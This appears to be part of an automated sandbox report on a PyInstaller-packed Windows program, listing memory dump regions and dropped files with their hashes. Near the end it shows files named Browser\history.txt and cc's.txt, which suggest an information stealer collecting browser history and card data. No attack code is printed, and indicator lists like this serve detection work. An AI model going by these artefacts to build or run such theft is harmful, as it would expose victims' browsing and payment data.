memory/4368-194-0x00007FFC306D0000-0x00007FFC30704000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_queue.pyd

MD5 d301ac14f79443990a227ec0aee1788c
SHA1 e6ba16b0ec6ac2ed63e3c2424bf92d4fe66405f9
SHA256 890d3522062a81f970a2c91acea9c68b91c9d77013afc34d5a950269b9e994b6
SHA512 2c2a3dda038309590965a6a2cb1ff86b6ba8a2fe9e97511c1e2a2cc63fda96ac7782b5eedfcf61479838249a064482b11657c0f4a6c3ed1f6338ebe0e0171ec1

C:\Users\Admin\AppData\Local\Temp\_MEI38162\pywintypes310.dll

MD5 51a19a965e387d0ceb64708a47149c9d
SHA1 f047a81b69c42f269f923c5f741a44613cbcb1d5
SHA256 b00a1a46c425ca266ea0080e5216bf00862dd3064e8c5ebd5fd3b6845b62f363
SHA512 5feab90c7f5c7156a7bf2bc41888d18cdf34c303d24402ae2e4c0a067c7fca1ff6d277df6b7533a3fd8bf158548badd34e99bdb948e129c5d3f7bacfb712300b

memory/4368-201-0x00007FFC307C0000-0x00007FFC307EE000-memory.dmp

memory/4368-200-0x00007FFC336F0000-0x00007FFC336FD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\VCRUNTIME140_1.dll

MD5 bba9680bc310d8d25e97b12463196c92
SHA1 9a480c0cf9d377a4caedd4ea60e90fa79001f03a
SHA256 e0b66601cc28ecb171c3d4b7ac690c667f47da6b6183bff80604c84c00d265ab
SHA512 1575c786ac3324b17057255488da5f0bc13ad943ac9383656baf98db64d4ec6e453230de4cd26b535ce7e8b7d41a9f2d3f569a0eff5a84aeb1c2f9d6e3429739

C:\Users\Admin\AppData\Local\Temp\_MEI38162\pythoncom310.dll

MD5 63c2e16fcd14f54b8c6165fef49d74e0
SHA1 3d00e9e6f2224c5808b5c2108234657d3bb42272
SHA256 a436ef349278d1efb223e86a4aee5332185363c0ac33468247a5dd8e6a4a61f1
SHA512 fdff546eb940a2c2bec00332d48aee8be06bcda11aee596d65d387462b8c3759ec174fdb5b11aaa18979ca59b7ac4f4aa98dff418b3e52629c92683c11e29b7b

memory/4368-205-0x00007FFC2FA70000-0x00007FFC2FB2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\win32api.pyd

MD5 29532841da8544665cb1ad1a127e4296
SHA1 b8852f095cbd0029480dfdfc04702cd6dd409001
SHA256 f611b06669774e42bda967a11d4ec2990c327492d5bc0f8afb555c8501214c77
SHA512 2b4059b38fe5314798e7b7de6065f6f5f9746bc59937e8c8842d293588c6cabb8979736d7b4693753301997a4b283020c7dc5bec0d8a70627b92510e3d1ddd6c

memory/4368-208-0x00007FFC2FA10000-0x00007FFC2FA3B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_sqlite3.pyd

MD5 c528dc5f5e7d87c63f09f31d8e2e8b7a
SHA1 6d09a5c9266876d8e466059fa3c0ef6f71f59a74
SHA256 2ea4fe9500ee3669ac29a7451ee775b3bc7e2104fe9e840af563499e23867a46
SHA512 358fb50590b958dca4138b12f31f5b053b5c2a251958b68662390ddd761f02185b283f23801a2cc0a15f12dc0f7ec9a4213228af27e9988889ccb7d3727b9c6a

memory/4368-218-0x00007FFC332D0000-0x00007FFC332F4000-memory.dmp

memory/4368-217-0x00007FFC2B910000-0x00007FFC2BA81000-memory.dmp

memory/4368-216-0x00007FFC31590000-0x00007FFC315AF000-memory.dmp

memory/4368-215-0x00007FFC2FCF0000-0x00007FFC3015E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\sqlite3.dll

MD5 b23329381855b6520ff86cf42838f84e
SHA1 79667fd09bc8b3a1a13658fbb5b6237725426d08
SHA256 2a1d451b5c7003200e3314bd195b48d1093c7583a667a25b1b6473c6d50efa74
SHA512 35f2fb242b5381ebc2267301a6efbc3331dfb0d479d61275386c73195344377f784534cc330d6b5d9456fc8d398161ae0b21506a8a311608220efaf4d5707fe8

C:\Users\Admin\AppData\Local\Temp\_MEI38162\psutil\_psutil_windows.pyd

MD5 7454e05b8b7b276bacbca3577f36a866
SHA1 3157ce432e7c2052fef149e5d6f94646814d8b02
SHA256 c4cccc0793f5b294752b8820b627c7d22b5bb9dfa82a1a5de9ada38a7596d059
SHA512 346a91d29a6e0b02c61aab4c43486091d9638126fb7f074c1c26457524fe7cb784efc6a5883822f07c20d006c93ceca24f4613b02e23a889cfd5565e66889810

memory/4368-221-0x00007FFC2F9F0000-0x00007FFC2FA0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_ssl.pyd

MD5 d3b40bb8131722d77dab6fd9bd135fca
SHA1 170143f91ebf1f1a41da05725f3d659d070e969e
SHA256 e33e96ee3e4135b92cbdb987337d3cf8e438f1cca96c87dec682b586b6807ce9
SHA512 b48730d8dd5c0dd43b300b3fc997b6a083d9d4c45816bbcf15428cd2ee8664b49bbfd9e645d9e27d707b243bfe061d12822accbe466822ba723fc23c13e41f69

C:\Users\Admin\AppData\Local\Temp\_MEI38162\libcrypto-1_1.dll

MD5 c702b01b9d16f58ad711bf53c0c73203
SHA1 dc6bb8e20c3e243cc342bbbd6605d3ae2ae8ae5b
SHA256 49363cba6a25b49a29c6add58258e9feb1c9531460f2716d463ab364d15120e1
SHA512 603d710eb21e2844739edcc9b6d2b0d7193cdbc9b9efe87c748c17fdc88fa66bc3fdae2dca83a42a17d91c4fdf571f93f5cc7cd15004f7cb0695d0130813aa7e

C:\Users\Admin\AppData\Local\Temp\_MEI38162\libssl-1_1.dll

MD5 eed3b4ac7fca65d8681cf703c71ea8de
SHA1 d50358d55cd49623bf4267dbee154b0cdb796931
SHA256 45c7be6f6958db81d9c0dacf2b63a2c4345d178a367cd33bbbb8f72ac765e73f
SHA512 df85605bc9f535bd736cafc7be236895f0a3a99cf1b45c1f2961c855d161bcb530961073d0360a5e9f1e72f7f6a632ce58760b0a4111c74408e3fcc7bfa41edd

memory/4368-228-0x00007FFC2F7E0000-0x00007FFC2F80E000-memory.dmp

memory/4368-232-0x00007FFC1EB40000-0x00007FFC1EEB5000-memory.dmp

memory/4368-233-0x000002107B450000-0x000002107B7C5000-memory.dmp

memory/4368-227-0x00007FFC36890000-0x00007FFC368A9000-memory.dmp

memory/4368-231-0x00007FFC2F5C0000-0x00007FFC2F678000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\zstandard\backend_c.cp310-win_amd64.pyd

MD5 5fb71555f26402206e56d0a481a397b6
SHA1 46d969fd404489f6f88c1babc84b59b1612b37fa
SHA256 5547b2cb3482ace8fc8a64bfff9604f1a1adb10375bc235c4d7139a38f8989fd
SHA512 d06e92be1acd819ab862695ffe722e63d43eaf169d9e46a43bd5a95233a5031d26e4c0c457ab295c556991577b2e0fdb04009d53257d9f2518034b56284b965b

memory/4368-236-0x00007FFC2C590000-0x00007FFC2C617000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_hashlib.pyd

MD5 47552c83d1890ff91037eecd02b730a2
SHA1 e9ab5c304f0a2817eba6fdc758722600615c30be
SHA256 c3024b95f7f1757d9496c8171eaca5f8b9bb8c7cd7f6077077b5aaa1302b0ca4
SHA512 d9d42b253fddca0eff99ff47ef5ff05a8ef53966c79e040ebe22757b31d478f71709460a36c8dbde67a43bd992983d3e4ae7775e9d687295763ffd283d0746d4

memory/4368-240-0x00007FFC2F980000-0x00007FFC2F994000-memory.dmp

memory/4368-239-0x00007FFC306D0000-0x00007FFC30704000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\charset_normalizer\md.cp310-win_amd64.pyd

MD5 b0d9f057445509aff2a322b7e2d676e6
SHA1 6773c897c71d9f31171ca04ee0feb0dfc61ffc0d
SHA256 c133d34db96deb5fdbad4bf5236b85fca1989058e94d932f359d178f343e9563
SHA512 50c77d9f52119213fc03f618d8c78f77449adb211da3db2926b2b04417db5b6caf2c5494f505882ea1ac112d5f4e007815d0eda124c9bb952ce47be162b3bb14

memory/4368-244-0x00007FFC307C0000-0x00007FFC307EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\charset_normalizer\md__mypyc.cp310-win_amd64.pyd

MD5 7e9cf82724596467af2ebcf2cf3c2f36
SHA1 8fe14237cee9574fe517e58bdf9c2b790efd6e54
SHA256 60ce38202c60ac8f5a7e49980fbe25f441d872e8870a12e6b0b9861fa60814ef
SHA512 787b2a4e5fdf4f4d72cd4934fe87b8068e97e454ca10e74c00769b0dc2e7b4a7224d4d783e82cad1094761fd01c18ca8dceac4a9c07846cba3a2997071e1690d

memory/4368-247-0x00007FFC33260000-0x00007FFC3326B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\unicodedata.pyd

MD5 184968e391f7cf291c0995ed0c12af5e
SHA1 be76ba78ff71f4aa68dbd42b69d7d5a1852e9206
SHA256 129feddb303265f0952092567d92915f1a7bdfc12dec91f6e8b8a3226cbb8ad3
SHA512 684210b1f2a7e775ea9b2407284cc18678f2bf7719010989c0f04838c84e1aec3f08046f9beed3ab64bedcb2b24f7d41bc7bc91ffc823f2880bf844dcc57ee63

memory/4368-249-0x00007FFC2FA70000-0x00007FFC2FB2C000-memory.dmp

memory/4368-253-0x00007FFC2B7F0000-0x00007FFC2B908000-memory.dmp

memory/4368-254-0x00007FFC2F550000-0x00007FFC2F588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_cffi_backend.cp310-win_amd64.pyd

MD5 cb71f6df80ff33ecb79df69a3efed164
SHA1 24034a149db4cca2605086fc7c204f6b6e58b6a0
SHA256 a60ef195d76f44fc5636b5cd4538e8643e3af450037d8288c140a84ebad83c70
SHA512 6c40e1a97b1596f703d04aac1c8d4e1c244f0d16b02d28ed4a96b6b55378f34da84e9a1fe55973150f64939f6475ff0b2bf590af8d90e97ff7a77d21436ad7df

C:\Users\Admin\AppData\Local\Temp\_MEI38162\Cryptodome\Cipher\_raw_ecb.pyd

MD5 11bd78bc617bb406686e85725ddf84ac
SHA1 f405c870f0440ff5b26a04443e73355c90d493a1
SHA256 2ebb4de7e133bac78d965375293044f49210a539893b9442b6bf8617ef2c13e6
SHA512 876021bb05784918c11881ac5c1aae8a3bfdf41472fcf83275a34013371181c8104b1115e9c7751ce0ce52270bee5321b007bfe5add76127b3e9cbcf7c2ed4bd

memory/4368-251-0x00007FFC2F590000-0x00007FFC2F5B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\Cryptodome\Cipher\_raw_cbc.pyd

MD5 dec82c76e28c8d51d0e5edb763abba0b
SHA1 564846af78caa62816c8d0399974b4fa77d40049
SHA256 c3c1190de8d3528efc594c628230cf99623c5e92f81ee2330e733049084b9226
SHA512 249901d5a59e26ba6efc87fc0ade827966dae6f1bc44678cbabd27940b365c03e08579e1dcced396f23de917349f47918905e8c4a3fe31a3c61858fcc19f7dfc

C:\Users\Admin\AppData\Local\Temp\_MEI38162\Cryptodome\Cipher\_raw_cfb.pyd

MD5 d343cae0269ecd709fa7ad23c90d0891
SHA1 3d402944188e64955f98619f7ceb6e53f858d9ad
SHA256 883b54e6209abf1fae0eb812d6f19a2a78bbd070702e4edab864917216c3a9f9
SHA512 5529c986e548603b81d630dea2e83be3664459bd2e430c369048e78ce2b9b59f1d2d83877de5529399931b4baaf8738b4f331c79ef80afed5b70a050fd431c30

memory/4368-260-0x00007FFC31590000-0x00007FFC315AF000-memory.dmp

memory/4368-264-0x00007FFC2F540000-0x00007FFC2F54B000-memory.dmp

memory/4368-263-0x00007FFC301B0000-0x00007FFC301BC000-memory.dmp

memory/4368-262-0x00007FFC30550000-0x00007FFC3055B000-memory.dmp

memory/4368-261-0x00007FFC305A0000-0x00007FFC305AB000-memory.dmp

memory/4368-265-0x00007FFC2B910000-0x00007FFC2BA81000-memory.dmp

memory/4368-271-0x00007FFC2C540000-0x00007FFC2C54E000-memory.dmp

memory/4368-270-0x00007FFC2C550000-0x00007FFC2C55C000-memory.dmp

memory/4368-269-0x00007FFC2C560000-0x00007FFC2C56C000-memory.dmp

memory/4368-268-0x00007FFC2C570000-0x00007FFC2C57B000-memory.dmp

memory/4368-272-0x00007FFC2F7E0000-0x00007FFC2F80E000-memory.dmp

memory/4368-267-0x00007FFC2C580000-0x00007FFC2C58C000-memory.dmp

memory/4368-279-0x00007FFC2BE40000-0x00007FFC2BE4C000-memory.dmp

memory/4368-284-0x00007FFC1E8E0000-0x00007FFC1EB32000-memory.dmp

memory/4368-283-0x00007FFC2C590000-0x00007FFC2C617000-memory.dmp

memory/4368-282-0x00007FFC2BDF0000-0x00007FFC2BE02000-memory.dmp

memory/4368-281-0x00007FFC2BDE0000-0x00007FFC2BDEC000-memory.dmp

memory/4368-280-0x00007FFC2BE10000-0x00007FFC2BE1D000-memory.dmp

memory/4368-278-0x00007FFC2BE50000-0x00007FFC2BE5C000-memory.dmp

memory/4368-277-0x00007FFC2BF10000-0x00007FFC2BF1B000-memory.dmp

memory/4368-276-0x00007FFC2BF20000-0x00007FFC2BF2B000-memory.dmp

memory/4368-275-0x00007FFC2C530000-0x00007FFC2C53C000-memory.dmp

memory/4368-274-0x000002107B450000-0x000002107B7C5000-memory.dmp

memory/4368-273-0x00007FFC1EB40000-0x00007FFC1EEB5000-memory.dmp

memory/4368-266-0x00007FFC2F5C0000-0x00007FFC2F678000-memory.dmp

memory/4368-286-0x00007FFC25D90000-0x00007FFC25DB9000-memory.dmp

memory/4368-285-0x00007FFC2B7E0000-0x00007FFC2B7EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bumpi12q.jc3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/396-312-0x0000025160DB0000-0x0000025160DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3jthTh7smH\Browser\history.txt

MD5 5638715e9aaa8d3f45999ec395e18e77
SHA1 4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

C:\Users\Admin\AppData\Local\Temp\3jthTh7smH\Browser\cc's.txt

MD5 5aa796b6950a92a226cc5c98ed1c47e8
SHA1 6706a4082fc2c141272122f1ca424a446506c44d
SHA256 c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

memory/4368-355-0x00007FFC2F550000-0x00007FFC2F588000-memory.dmp

memory/4368-357-0x00007FFC2FCF0000-0x00007FFC3015E000-memory.dmp

memory/4368-381-0x00007FFC2C550000-0x00007FFC2C55C000-memory.dmp

memory/4368-370-0x00007FFC2B910000-0x00007FFC2BA81000-memory.dmp

memory/4368-396-0x00007FFC2C540000-0x00007FFC2C54E000-memory.dmp

memory/4368-402-0x00007FFC1E8E0000-0x00007FFC1EB32000-memory.dmp

memory/4368-416-0x00007FFC2BDE0000-0x00007FFC2BDEC000-memory.dmp

memory/4368-415-0x00007FFC2BE10000-0x00007FFC2BE1D000-memory.dmp

memory/4368-414-0x00007FFC2BE40000-0x00007FFC2BE4C000-memory.dmp

memory/4368-413-0x00007FFC2BE50000-0x00007FFC2BE5C000-memory.dmp

memory/4368-412-0x00007FFC2BF10000-0x00007FFC2BF1B000-memory.dmp

memory/4368-411-0x00007FFC2BF20000-0x00007FFC2BF2B000-memory.dmp

memory/4368-410-0x00007FFC2C530000-0x00007FFC2C53C000-memory.dmp

memory/4368-409-0x00007FFC2C560000-0x00007FFC2C56C000-memory.dmp

memory/4368-408-0x00007FFC2C570000-0x00007FFC2C57B000-memory.dmp

memory/4368-407-0x00007FFC2C580000-0x00007FFC2C58C000-memory.dmp

memory/4368-406-0x00007FFC2F540000-0x00007FFC2F54B000-memory.dmp

memory/4368-405-0x00007FFC301B0000-0x00007FFC301BC000-memory.dmp

memory/4368-404-0x00007FFC30550000-0x00007FFC3055B000-memory.dmp

memory/4368-403-0x00007FFC305A0000-0x00007FFC305AB000-memory.dmp

memory/4368-401-0x00007FFC33260000-0x00007FFC3326B000-memory.dmp

memory/4368-399-0x00007FFC2C590000-0x00007FFC2C617000-memory.dmp

memory/4368-398-0x00007FFC2F550000-0x00007FFC2F588000-memory.dmp

memory/4368-397-0x00007FFC2BDF0000-0x00007FFC2BE02000-memory.dmp

memory/4368-395-0x00007FFC2F7E0000-0x00007FFC2F80E000-memory.dmp

memory/4368-394-0x00007FFC2F9F0000-0x00007FFC2FA0C000-memory.dmp

memory/4368-393-0x00007FFC31590000-0x00007FFC315AF000-memory.dmp

memory/4368-392-0x00007FFC2FA10000-0x00007FFC2FA3B000-memory.dmp

memory/4368-391-0x00007FFC2F590000-0x00007FFC2F5B6000-memory.dmp

memory/4368-390-0x00007FFC307C0000-0x00007FFC307EE000-memory.dmp

memory/4368-389-0x00007FFC336F0000-0x00007FFC336FD000-memory.dmp

memory/4368-388-0x00007FFC306D0000-0x00007FFC30704000-memory.dmp

memory/4368-387-0x00007FFC307F0000-0x00007FFC3081D000-memory.dmp

memory/4368-386-0x00007FFC332B0000-0x00007FFC332C9000-memory.dmp

memory/4368-385-0x00007FFC33700000-0x00007FFC3370D000-memory.dmp

memory/4368-384-0x00007FFC36890000-0x00007FFC368A9000-memory.dmp

memory/4368-383-0x00007FFC39AA0000-0x00007FFC39AAF000-memory.dmp

memory/4368-382-0x00007FFC332D0000-0x00007FFC332F4000-memory.dmp

memory/4368-379-0x00007FFC2B7F0000-0x00007FFC2B908000-memory.dmp

memory/4368-376-0x00007FFC2F980000-0x00007FFC2F994000-memory.dmp

memory/4368-374-0x00007FFC1EB40000-0x00007FFC1EEB5000-memory.dmp

memory/4368-400-0x00007FFC25D90000-0x00007FFC25DB9000-memory.dmp

memory/4368-373-0x00007FFC2F5C0000-0x00007FFC2F678000-memory.dmp

memory/4368-367-0x00007FFC2FA70000-0x00007FFC2FB2C000-memory.dmp